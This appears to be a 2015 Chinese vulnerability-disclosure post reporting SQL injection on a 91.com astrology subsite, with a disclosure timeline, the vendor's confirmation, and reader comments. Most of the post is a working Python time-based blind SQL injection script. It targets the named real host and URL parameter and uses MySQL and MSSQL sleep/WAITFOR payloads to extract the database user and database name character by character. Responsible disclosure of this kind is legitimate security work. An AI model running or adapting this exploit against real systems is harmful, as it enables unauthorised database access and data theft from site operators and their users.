2015-01-09: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-23: 细节向公众公开
91分站存在SQL注入漏洞(附脚本)
current result is PHPDivine@
#!/usr/bin/python# coding=utf-8import httplib,time,string,sys,random,urllibdef getPayloadURL(url,i,payload,payload_type): if payload_type == 1: s = "if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 2: s = "if(ascii(mid(database(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 3: s = "W8ul0scE';if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 4: s = "W8ul0scE';if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 5: s = "aa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 6: s = "aa'XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 7: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 8: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 9: s = "-1;if(ascii(substring(USER,%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) elif payload_type == 10: s = "-1;if(ascii(substring(DB_NAME(),%s,1))=%s) WAITFOR DELAY '00:00:6'--" % (i,ord(payload)) return url + urllib.quote(s)def exploit(host,url,payload_type,timeout=5): res = '' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] for i in range(1,30,1): for payload in payloads: try: conn = httplib.HTTPConnection(host, timeout=timeout) print payload, conn.request(method='GET',url=getPayloadURL(url,i,payload,payload_type),headers={}) sys.stdout.flush() conn.getresponse().read() conn.close() except Exception,e: res += payload print "\ncurrent result is",res break print resif __name__=='__main__': host = 'm.astro.91.com' url= '/StarMatchResult.aspx?ddlGirlStar=%B0%D7%D1%F2&ddlBoyStar=' payload_type = 5 exploit(host,url,payload_type)
危害等级:中
漏洞Rank:7
确认时间:2015-01-12 15:19
感谢支持,我司已安排修复
暂无
这估计要成为标准格式了
@xsser 为什么都写着附脚本?这样做意义在哪儿
写附脚本能上首页!!
@Mr.leo 额,sqlmap就能搞定,不理解
@HackBraid 看到附脚本就想到了李姐姐